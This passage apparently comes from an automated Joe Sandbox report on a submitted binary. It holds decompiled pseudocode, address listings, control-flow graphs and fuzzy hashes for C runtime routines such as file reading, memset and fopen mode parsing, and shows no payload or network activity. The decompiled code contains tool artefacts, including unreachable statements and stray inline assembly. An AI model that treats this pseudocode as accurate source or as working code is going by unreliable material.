										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E009AF6B7(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E009AF100())) = 0x16;
				goto L4;
			}




























                                                          0x009ae4d4
                                                          0x009ae4d7
                                                          0x009ae4dd
                                                          0x009ae4e0
                                                          0x009ae4e3
                                                          0x009ae500
                                                          0x00000000
                                                          0x009ae500
                                                          0x009ae4e5
                                                          0x009ae4ea
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae4ee
                                                          0x009ae509
                                                          0x009ae50c
                                                          0x009ae50e
                                                          0x009ae51c
                                                          0x009ae51c
                                                          0x009ae520
                                                          0x009ae528
                                                          0x009ae52d
                                                          0x009ae52d
                                                          0x009ae530
                                                          0x009ae532
                                                          0x00000000
                                                          0x009ae534
                                                          0x009ae534
                                                          0x009ae53c
                                                          0x009ae53e
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae540
                                                          0x009ae543
                                                          0x009ae546
                                                          0x009ae54d
                                                          0x009ae54f
                                                          0x009ae556
                                                          0x009ae551
                                                          0x009ae551
                                                          0x009ae551
                                                          0x009ae55b
                                                          0x009ae55e
                                                          0x009ae560
                                                          0x009ae649
                                                          0x00000000
                                                          0x009ae566
                                                          0x009ae566
                                                          0x009ae566
                                                          0x009ae56d
                                                          0x009ae5ae
                                                          0x009ae5ae
                                                          0x009ae5b0
                                                          0x009ae61b
                                                          0x009ae621
                                                          0x009ae624
                                                          0x009ae67b
                                                          0x00000000
                                                          0x009ae681
                                                          0x009ae626
                                                          0x009ae629
                                                          0x009ae62b
                                                          0x009ae651
                                                          0x009ae651
                                                          0x009ae655
                                                          0x009ae65f
                                                          0x009ae664
                                                          0x009ae66c
                                                          0x009ae4fb
                                                          0x009ae4fb
                                                          0x00000000
                                                          0x009ae4fb
                                                          0x009ae62d
                                                          0x009ae630
                                                          0x009ae633
                                                          0x009ae634
                                                          0x009ae637
                                                          0x009ae637
                                                          0x009ae638
                                                          0x009ae63b
                                                          0x009ae63e
                                                          0x00000000
                                                          0x009ae63e
                                                          0x009ae5b2
                                                          0x009ae5b4
                                                          0x009ae5d8
                                                          0x009ae5dd
                                                          0x009ae5e3
                                                          0x009ae5e5
                                                          0x009ae5e5
                                                          0x009ae5b6
                                                          0x009ae5b8
                                                          0x009ae5be
                                                          0x009ae5d0
                                                          0x009ae5d0
                                                          0x009ae5d0
                                                          0x009ae5d2
                                                          0x009ae5c0
                                                          0x009ae5c5
                                                          0x009ae5c7
                                                          0x009ae5c7
                                                          0x009ae5d4
                                                          0x009ae5d4
                                                          0x009ae5e7
                                                          0x009ae5ea
                                                          0x00000000
                                                          0x009ae5ec
                                                          0x009ae5ec
                                                          0x009ae5ed
                                                          0x009ae5f7
                                                          0x009ae5f8
                                                          0x009ae5fd
                                                          0x009ae600
                                                          0x009ae602
                                                          0x009ae689
                                                          0x00000000
                                                          0x009ae689
                                                          0x009ae608
                                                          0x009ae60b
                                                          0x009ae677
                                                          0x009ae677
                                                          0x009ae677
                                                          0x009ae677
                                                          0x00000000
                                                          0x009ae677
                                                          0x009ae60d
                                                          0x009ae60d
                                                          0x009ae60f
                                                          0x009ae60f
                                                          0x009ae612
                                                          0x009ae615
                                                          0x00000000
                                                          0x009ae615
                                                          0x009ae5ea
                                                          0x009ae56f
                                                          0x009ae572
                                                          0x009ae575
                                                          0x009ae577
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae579
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae57f
                                                          0x009ae581
                                                          0x009ae583
                                                          0x009ae585
                                                          0x009ae585
                                                          0x009ae588
                                                          0x009ae58b
                                                          0x009ae58d
                                                          0x00000000
                                                          0x009ae593
                                                          0x009ae59a
                                                          0x009ae59f
                                                          0x009ae5a2
                                                          0x009ae5a5
                                                          0x009ae5a8
                                                          0x009ae5aa
                                                          0x00000000
                                                          0x009ae5aa
                                                          0x009ae641
                                                          0x009ae641
                                                          0x009ae641
                                                          0x00000000
                                                          0x009ae566
                                                          0x009ae560
                                                          0x009ae532
                                                          0x009ae515
                                                          0x009ae518
                                                          0x009ae51a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae51a
                                                          0x009ae4f0
                                                          0x009ae4f5
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: dec36020ab5e21e387c48e588288fb4903bd2f480129c21f6f16942797cf5b7f
                                                          • Instruction ID: caf1a86da483b6d82a2ba1a17679e1ed2f350771cc86c9dba7a5160017a99b48
                                                          • Opcode Fuzzy Hash: dec36020ab5e21e387c48e588288fb4903bd2f480129c21f6f16942797cf5b7f
                                                          • Instruction Fuzzy Hash: D451B230E00705DBDF249FA9988466EB7A9AF53324F248B29F826962D0E775DD508BD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A696E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 9a696e-9aeed3 241 9aef18-9aef1f 238->241 242 9aeed5-9aeed8 238->242 243 9aefa8-9aefaa 241->243 244 9aeeda-9aeedd 242->244 245 9aef07-9aef0a 242->245 247 9aefae-9aefb7 243->247 248 9aeedf-9aeee2 244->248 249 9aeefc-9aef02 244->249 245->243 246 9aef10-9aef13 245->246 246->247 250 9aeeae-9aeeb0 247->250 251 9aefbd-9aefc2 247->251 252 9aee68-9aee73 call 9af100 call 9aeb1e 248->252 253 9aeee4-9aeee7 248->253 249->247 250->251 256 9aeeb6-9aeebc 250->256 254 9aefc8-9aefcb 251->254 255 9af06e-9af071 251->255 273 9aee78-9aee7a 252->273 253->243 258 9aeeed-9aeef7 253->258 260 9aefd0-9aefd3 254->260 259 9af076-9af079 255->259 261 9aef4c-9aef4f 256->261 262 9aeec2 256->262 258->247 264 9af07b-9af080 259->264 265 9af073 259->265 266 9aefcd 260->266 267 9aefd5-9aefe7 call 9b2d83 260->267 270 9aefa1-9aefa6 261->270 271 9aef51-9aef54 261->271 268 9aef3a-9aef3e 262->268 269 9aeec4-9aeec7 262->269 264->252 274 9af086-9af096 call 9b2d65 264->274 265->259 266->260 267->252 291 9aefed-9aeff3 267->291 268->243 277 9aef40-9aef4a 268->277 269->247 278 9aeecd-9aeed0 269->278 270->243 276 9aefac 270->276 279 9aef91-9aef97 271->279 280 9aef56-9aef57 271->280 281 9af0c5-9af0cb 273->281 289 9af09b-9af0a0 274->289 276->247 277->247 285 9aeed2-9aeed3 278->285 286 9aef24-9aef27 278->286 279->243 284 9aef99-9aef9f 279->284 287 9aef59-9aef5c 280->287 288 9aef84-9aef86 280->288 284->247 285->241 285->242 286->243 292 9aef29-9aef38 286->292 293 9aef5e-9aef61 287->293 294 9aef77-9aef79 287->294 288->243 290 9aef88-9aef8f 288->290 289->273 296 9af0a6-9af0c2 289->296 290->247 297 9aeff8-9aeffb 291->297 292->247 293->252 298 9aef67-9aef6d 293->298 294->243 295 9aef7b-9aef82 294->295 295->247 296->281 300 9aeffd-9af001 297->300 301 9aeff5 297->301 298->243 299 9aef6f-9aef75 298->299 299->247 300->252 302 9af007-9af00d 300->302 301->297 302->302 303 9af00f-9af021 call 9b2e52 302->303 306 9af02e-9af040 call 9b2e52 303->306 307 9af023-9af02c 303->307 310 9af04d-9af05f call 9b2e52 306->310 311 9af042-9af04b 306->311 307->255 310->252 314 9af065-9af068 310->314 311->255 314->255
                                                          C-Code - Quality: 99%
                                                          			E009A696E(signed int __eax, signed int __ebx, void* __ecx, void* __edx, signed int __edi, signed int __esi) {
				signed int _t34;
				signed short _t35;
				void* _t37;
				intOrPtr* _t41;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				void* _t62;
				signed int _t63;
				signed int _t66;
				intOrPtr* _t68;
				void* _t69;
				void* _t71;
				void* _t74;
				intOrPtr _t75;

				_t66 = __esi;
				_t63 = __edi;
				_t62 = __edx;
				_t59 = __ecx;
				_t56 = __ebx;
				_t34 = __eax;
				while(1) {
					asm("rol byte [ebx-0x70f0ac08], 0x8a");
					 *_t34 =  *_t34 + _t34;
					_t1 = _t66 + _t66 * 2 - 0x7d;
					 *_t1 =  *((intOrPtr*)(_t66 + _t66 * 2 - 0x7d)) + _t62;
					_t75 =  *_t1;
					if(_t75 == 0) {
						if( *((intOrPtr*)(_t69 - 4)) != 0) {
							goto L37;
						} else {
							 *((intOrPtr*)(_t69 - 4)) = 1;
							_t56 = _t56 | 0x00000020;
						}
						goto L39;
					} else {
						_t50 = _t34 - 0x20;
						if(_t50 == 0) {
							L39:
							_t66 = _t66 + 2;
							_t35 =  *_t66 & 0x0000ffff;
							if(_t35 != 0) {
								if(_t59 == 0) {
									goto L40;
								} else {
									_t34 = _t35 & 0x0000ffff;
									continue;
								}
							} else {
								L40:
								if( *((intOrPtr*)(_t69 - 8)) == 0) {
									L56:
									_t37 = 0x20;
									while( *_t66 == _t37) {
										_t66 = _t66 + 2;
									}
									if( *_t66 != 0) {
										goto L1;
									} else {
										_t43 = E009B2D65(_t69 + 0xc,  *((intOrPtr*)(_t69 + 8)), _t56,  *((intOrPtr*)(_t69 + 0x10)), 0x180); // executed
										if(_t43 != 0) {
											goto L2;
										} else {
											_t41 =  *((intOrPtr*)(_t69 + 0x14));
											 *0x9cf1ec =  *0x9cf1ec + 1;
											 *((intOrPtr*)(_t41 + 4)) = 0;
											 *_t41 = 0;
											 *((intOrPtr*)(_t41 + 8)) = 0;
											 *((intOrPtr*)(_t41 + 0x1c)) = 0;
											 *(_t41 + 0xc) = _t63;
											 *((intOrPtr*)(_t41 + 0x10)) =  *((intOrPtr*)(_t69 + 0xc));
										}
									}
								} else {
									_t44 = 0x20;
									while( *_t66 == _t44) {
										_t66 = _t66 + 2;
									}
									_t45 = E009B2D83("ccs", _t66, 3);
									_t74 = _t71 + 0xc;
									if(_t45 != 0) {
										goto L1;
									} else {
										_t68 = _t66 + 6;
										_t46 = 0x20;
										while( *_t68 == _t46) {
											_t68 = _t68 + 2;
										}
										if( *_t68 != 0x3d) {
											goto L1;
										} else {
											do {
												_t68 = _t68 + 2;
											} while ( *_t68 == _t46);
											_t47 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-8", 5);
											_t71 = _t74 + 0xc;
											if(_t47 != 0) {
												_t48 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-16LE", 8);
												_t71 = _t71 + 0xc;
												if(_t48 != 0) {
													_t49 = E009B2E52(_t56, _t59, _t68, _t68, L"UNICODE", 7);
													_t71 = _t71 + 0xc;
													if(_t49 != 0) {
														goto L1;
													} else {
														_t66 = _t68 + 0xe;
														_t56 = _t56 | 0x00010000;
														goto L56;
													}
												} else {
													_t66 = _t68 + 0x10;
													_t56 = _t56 | 0x00020000;
													goto L56;
												}
											} else {
												_t66 = _t68 + 0xa;
												_t56 = _t56 | 0x00040000;
												goto L56;
											}
										}
									}
								}
							}
						} else {
							_t51 = _t50 - 0xb;
							if(_t51 == 0) {
								if((_t56 & 0x00000002) != 0) {
									goto L37;
								} else {
									_t56 = _t56 & 0xfffffffe | 0x00000002;
									_t63 = _t63 & 0xfffffffc | 0x00000080;
								}
								goto L39;
							} else {
								_t52 = _t51 - 1;
								if(_t52 == 0) {
									 *((intOrPtr*)(_t69 - 8)) = 1;
									goto L37;
								} else {
									_t53 = _t52 - 0x18;
									if(_t53 == 0) {
										if((_t56 & 0x00000040) != 0) {
											goto L37;
										} else {
											_t56 = _t56 | 0x00000040;
										}
										goto L39;
									} else {
										_t54 = _t53 - 0xa;
										if(_t54 == 0) {
											_t56 = _t56 | 0x00000080;
											goto L39;
										} else {
											_t55 = _t54 - 4;
											if(_t55 != 0) {
												L1:
												 *((intOrPtr*)(E009AF100())) = 0x16;
												E009AEB1E();
												L2:
												_t41 = 0;
											} else {
												if( *((intOrPtr*)(_t69 - 4)) != _t55) {
													L37:
													_t59 = 0;
												} else {
													 *((intOrPtr*)(_t69 - 4)) = 1;
													_t56 = _t56 | 0x00000010;
												}
												goto L39;
											}
										}
									}
								}
							}
						}
					}
					L62:
					return _t41;
					__eax = __eax - 0x54;
					if(__eax == 0) {
						__eax =  *(__ebp + 0xc);
						if((__eax & __ebx) == 0) {
							__ebx = __ebx | __eax;
						} else {
							goto L37;
						}
						goto L39;
					} else {
						__eax = __eax - 0xe;
						if(__eax == 0) {
							if((__ebx & 0x0000c000) != 0) {
								goto L37;
							} else {
								__ebx = __ebx | 0x00008000;
							}
							goto L39;
						} else {
							__eax = __eax - 1;
							if(__eax == 0) {
								if(__edx != 0) {
									goto L37;
								} else {
									__edx = __edx + 1;
									__edi = __edi | 0x00004000;
								}
								goto L39;
							} else {
								__eax = __eax - 0xb;
								if(__eax == 0) {
									if(__edx != 0) {
										goto L37;
									} else {
										__edx = __edx + 1;
										__edi = __edi & 0xffffbfff;
									}
									goto L39;
								} else {
									__eax = __eax - 6;
									if(__eax != 0) {
										goto L1;
									} else {
										if((__ebx & 0x0000c000) != 0) {
											goto L37;
										} else {
											__ebx = __ebx | 0x00004000;
										}
										goto L39;
									}
								}
							}
						}
					}
					goto L62;
				}
			}






























                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009a696e
                                                          0x009aeeb8
                                                          0x009aeeb8
                                                          0x009aeebf
                                                          0x009aeec1
                                                          0x009aeec1
                                                          0x009aeec1
                                                          0x009aeec2
                                                          0x009aef3e
                                                          0x00000000
                                                          0x009aef40
                                                          0x009aef40
                                                          0x009aef47
                                                          0x009aef47
                                                          0x00000000
                                                          0x009aeec4
                                                          0x009aeec4
                                                          0x009aeec7
                                                          0x009aefae
                                                          0x009aefae
                                                          0x009aefb1
                                                          0x009aefb7
                                                          0x009aeeb0
                                                          0x00000000
                                                          0x009aeeb6
                                                          0x009aeeb6
                                                          0x00000000
                                                          0x009aeeb6
                                                          0x009aefbd
                                                          0x009aefbd
                                                          0x009aefc2
                                                          0x009af06e
                                                          0x009af070
                                                          0x009af076
                                                          0x009af073
                                                          0x009af073
                                                          0x009af080
                                                          0x00000000
                                                          0x009af086
                                                          0x009af096
                                                          0x009af0a0
                                                          0x00000000
                                                          0x009af0a6
                                                          0x009af0a6
                                                          0x009af0a9
                                                          0x009af0b1
                                                          0x009af0b4
                                                          0x009af0b6
                                                          0x009af0b9
                                                          0x009af0bf
                                                          0x009af0c2
                                                          0x009af0c2
                                                          0x009af0a0
                                                          0x009aefc8
                                                          0x009aefca
                                                          0x009aefd0
                                                          0x009aefcd
                                                          0x009aefcd
                                                          0x009aefdd
                                                          0x009aefe2
                                                          0x009aefe7
                                                          0x00000000
                                                          0x009aefed
                                                          0x009aefef
                                                          0x009aeff2
                                                          0x009aeff8
                                                          0x009aeff5
                                                          0x009aeff5
                                                          0x009af001
                                                          0x00000000
                                                          0x009af007
                                                          0x009af007
                                                          0x009af007
                                                          0x009af00a
                                                          0x009af017
                                                          0x009af01c
                                                          0x009af021
                                                          0x009af036
                                                          0x009af03b
                                                          0x009af040
                                                          0x009af055
                                                          0x009af05a
                                                          0x009af05f
                                                          0x00000000
                                                          0x009af065
                                                          0x009af065
                                                          0x009af068
                                                          0x00000000
                                                          0x009af068
                                                          0x009af042
                                                          0x009af042
                                                          0x009af045
                                                          0x00000000
                                                          0x009af045
                                                          0x009af023
                                                          0x009af023
                                                          0x009af026
                                                          0x00000000
                                                          0x009af026
                                                          0x009af021
                                                          0x009af001
                                                          0x009aefe7
                                                          0x009aefc2
                                                          0x009aeecd
                                                          0x009aeecd
                                                          0x009aeed0
                                                          0x009aef27
                                                          0x00000000
                                                          0x009aef29
                                                          0x009aef2f
                                                          0x009aef32
                                                          0x009aef32
                                                          0x00000000
                                                          0x009aeed2
                                                          0x009aeed2
                                                          0x009aeed3
                                                          0x009aef18
                                                          0x00000000
                                                          0x009aeed5
                                                          0x009aeed5
                                                          0x009aeed8
                                                          0x009aef0a
                                                          0x00000000
                                                          0x009aef10
                                                          0x009aef10
                                                          0x009aef10
                                                          0x00000000
                                                          0x009aeeda
                                                          0x009aeeda
                                                          0x009aeedd
                                                          0x009aeefc
                                                          0x00000000
                                                          0x009aeedf
                                                          0x009aeedf
                                                          0x009aeee2
                                                          0x009aee68
                                                          0x009aee6d
                                                          0x009aee73
                                                          0x009aee78
                                                          0x009aee78
                                                          0x009aeee4
                                                          0x009aeee7
                                                          0x009aefa8
                                                          0x009aefa8
                                                          0x009aeeed
                                                          0x009aeeed
                                                          0x009aeef4
                                                          0x009aeef4
                                                          0x00000000
                                                          0x009aeee7
                                                          0x009aeee2
                                                          0x009aeedd
                                                          0x009aeed8
                                                          0x009aeed3
                                                          0x009aeed0
                                                          0x009aeec7
                                                          0x009af0c5
                                                          0x009af0cb
                                                          0x009aef4c
                                                          0x009aef4f
                                                          0x009aefa1
                                                          0x009aefa6
                                                          0x009aefac
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009aef51
                                                          0x009aef51
                                                          0x009aef54
                                                          0x009aef97
                                                          0x00000000
                                                          0x009aef99
                                                          0x009aef99
                                                          0x009aef99
                                                          0x00000000
                                                          0x009aef56
                                                          0x009aef56
                                                          0x009aef57
                                                          0x009aef86
                                                          0x00000000
                                                          0x009aef88
                                                          0x009aef88
                                                          0x009aef89
                                                          0x009aef89
                                                          0x00000000
                                                          0x009aef59
                                                          0x009aef59
                                                          0x009aef5c
                                                          0x009aef79
                                                          0x00000000
                                                          0x009aef7b
                                                          0x009aef7b
                                                          0x009aef7c
                                                          0x009aef7c
                                                          0x00000000
                                                          0x009aef5e
                                                          0x009aef5e
                                                          0x009aef61
                                                          0x00000000
                                                          0x009aef67
                                                          0x009aef6d
                                                          0x00000000
                                                          0x009aef6f
                                                          0x009aef6f
                                                          0x009aef6f
                                                          0x00000000
                                                          0x009aef6d
                                                          0x009aef61
                                                          0x009aef5c
                                                          0x009aef57
                                                          0x009aef54
                                                          0x00000000
                                                          0x009aef4f

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$__sopen_s
                                                          • String ID: UTF-8$ccs
                                                          • API String ID: 857951187-3758431669
                                                          • Opcode ID: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction ID: 4b2e69dc4f78fac0a1503b9ee42290595fd844123da3f70e22aeeef58802cad3
                                                          • Opcode Fuzzy Hash: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction Fuzzy Hash: 0031F772D043529EEB305F649C04A697BA8DB17354F24886FE845DB1C2E670CD80C7E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009AE6AA Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 315 9ae6aa-9ae6be call 9af1e0 318 9ae6c0-9ae6c3 315->318 319 9ae6f1 315->319 318->319 320 9ae6c5-9ae6ca 318->320 321 9ae6f3-9ae6f8 call 9af225 319->321 322 9ae6f9-9ae710 call 9aec39 call 9ae4ca 320->322 323 9ae6cc-9ae6d0 320->323 335 9ae715-9ae72b call 9ae733 322->335 326 9ae6d2-9ae6de call 9ae740 323->326 327 9ae6e1-9ae6ec call 9af100 call 9aeb1e 323->327 326->327 327->319 335->321
                                                          C-Code - Quality: 89%
                                                          			E009AE6AA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x9cc0b0);
				E009AF1E0(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E009AEC39(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E009AE4CA( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E009AE733(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E009AE740( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E009AF100())) = 0x16;
						E009AEB1E();
						goto L6;
					}
				}
				return E009AF225(_t16);
			}







                                                          0x009ae6aa
                                                          0x009ae6ac
                                                          0x009ae6b1
                                                          0x009ae6b8
                                                          0x009ae6be
                                                          0x009ae6f1
                                                          0x009ae6f1
                                                          0x009ae6c5
                                                          0x009ae6c5
                                                          0x009ae6ca
                                                          0x009ae6fa
                                                          0x009ae700
                                                          0x009ae710
                                                          0x009ae718
                                                          0x009ae71a
                                                          0x009ae71d
                                                          0x009ae724
                                                          0x009ae729
                                                          0x009ae6cc
                                                          0x009ae6d0
                                                          0x009ae6d9
                                                          0x009ae6de
                                                          0x009ae6e6
                                                          0x009ae6ec
                                                          0x00000000
                                                          0x009ae6ec
                                                          0x009ae6ca
                                                          0x009ae6f8

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: 87ee1bd5ba8a3f7cae3f8e5468f1a69940e34cebf956f59f654f3e6eb34109c2
                                                          • Instruction ID: 323f31f0f9d33f493c4898de26724252b738a9424484a2625008708f6a16134b
                                                          • Opcode Fuzzy Hash: 87ee1bd5ba8a3f7cae3f8e5468f1a69940e34cebf956f59f654f3e6eb34109c2
                                                          • Instruction Fuzzy Hash: EE016771800219EBCF12AFA5CC02B9E7B75AFD2360F148615F82457191D7758A21DFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009AE38B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 408 9ae38b-9ae39f call 9ae3e5
                                                          C-Code - Quality: 25%
                                                          			E009AE38B(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E009AE3E5(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                                                          0x009ae38e
                                                          0x009ae390
                                                          0x009ae393
                                                          0x009ae396
                                                          0x009ae39f

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                          • Instruction ID: 03ee7efac9cbe160172f0330c46c8336adebe5bb8d9aa8a063a39b2db402a7e1
                                                          • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                          • Instruction Fuzzy Hash: A2B0927244020C77CE012A82EC02B493B5A9B816A4F008020FB0C191A1AA73A66096C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 009A3663 Relevance: 116.2, APIs: 77, Instructions: 721COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E009A3663(void* __ecx, void* __edx, void* __edi, signed int __esi) {
				void* __ebx;
				signed int _t232;
				intOrPtr* _t308;
				signed int _t389;
				void* _t390;
				void* _t392;
				void* _t393;
				void* _t395;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				void* _t477;

				_t393 = __edx;
				_t392 = __ecx;
				_t398 = __esi | E009B4CB1(_t390, __edi, __esi, _t477 - 8, 1, _t390, 0x2d, __edi + 0x2c);
				_t399 = _t398 | E009B4CB1(_t390, __edi, _t398, _t477 - 8, 1, _t390, 0x2e, __edi + 0x30);
				_t400 = _t399 | E009B4CB1(_t390, __edi, _t399, _t477 - 8, 1, _t390, 0x2f, __edi + 0x34);
				_t401 = _t400 | E009B4CB1(_t390, __edi, _t400, _t477 - 8, 1, _t390, 0x30, __edi + 0x1c);
				_t402 = _t401 | E009B4CB1(_t390, __edi, _t401, _t477 - 8, 1, _t390, 0x44, __edi + 0x38);
